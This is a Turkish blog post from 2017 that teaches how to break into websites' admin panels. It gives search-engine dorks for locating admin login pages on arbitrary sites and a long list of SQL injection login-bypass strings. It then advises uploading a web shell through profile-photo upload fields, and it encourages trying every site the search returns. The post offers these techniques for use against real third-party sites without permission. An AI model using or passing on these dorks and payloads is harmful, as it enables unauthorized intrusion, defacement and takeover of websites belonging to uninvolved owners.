6 Mart 2017 Pazartesi

Bypass Dork Yazma ve Site Hackleme!

Bypass nedir ? 

Bana göre bypass script kodlanmasındaki hatalardan yararlanarak admin login ve pass ' ı bug 'a sokarak giriş yapmamızı sağlayan küçük bir hata ve büyük bir zarar...


Başlayalım hadi (:

ByPass için dork nasıl yazıcağız nasıl site bulabileceğiz ?

ByPass dorklarımızı kendimiz oluşturalım 


Örnek çok kullanılan dorklar : 






inurl:/admin/login.php
inurl:/administrator/index.php
inurl:/admins/login.php
inurl/admin1/login.php
Bunlar çok kullanılan favori dorklar arasındadır

Ama hacklenen siteleri kaç kere hackleyebileceğizki hep aynı siteler (:

Öncelikle bir sitenin admin panelini buluyoruz 


ByPass için Login ve Pass lar ; 


'=' 'or'
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1-- 
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
Evet bir sitenin admin logini bulduk diyelim (:

Örnek admin loginler ; 


Yeni bir dork oluşturmayıda ekleyim bari konuya

Arkadaşlar bu dorklardan fazla site çıkmayabilir bunun içinde diğer şekilde şöyle bir mantıkla kendi kafamızdaki kelimeler ile site çıkartabiliriz .. Örnek ; 



inurl:admin/login.php intext:Skoda
inurl:admin/login.php intext:Daikin
intext Komutuna kelime ekleyerek daha değişik siteler çıkartabilirsiniz :=)


inurl:/manager/login.php
inurl:/panelv2/login.php
inurl:/panel/login.php
inurl:/eng/login.php




Ve arkadaşlar girdik panele başarılı olduk lakin her siteye girmez dediğim gibi (:

Bazen kullanıcı paneli çıkar giriş yaparsınız edit yaparsınız ee neden sitede hiçbirşey değişmedi dersiniz , çünkü orası user giriş yeri admin yetkisi yoktur (:


Ee değişmedi diye hemen çıkacak değiliz dimi (:
Biraz uğraşıcağız , kullanıcı panelinde upload yeri varmı onu araştırıcağız.
Profil fotoğrafı yükleme yetkisi var ise shell yüklemeyi deniyeceğiz 


Bypass Dorkları ile Nasıl Giriş Yapılır Oda Videoda Anlatılmıştır ; 





Arkadaşlar bu dork oluşturma sizlerin hayal gücünüze kalmış birşey tabiki her siteye girecek diye birşey yoktur ama eğer başarılı olmak istiyor iseniz sonuna kadar denemelisiniz (:
Başarı sır değildir.

Evet arkadaşlar anlatacağım bu kadar bence fazlaya gerek yok (:

Dediğim gibi siteye girmiyor diye bıkmayın bunun için googlede yandexte vs. dorkları aradağımızda önümüze çıkan siteleri tek tek deneyeceğiz.
Azimli olun yeterli.




3 yorum: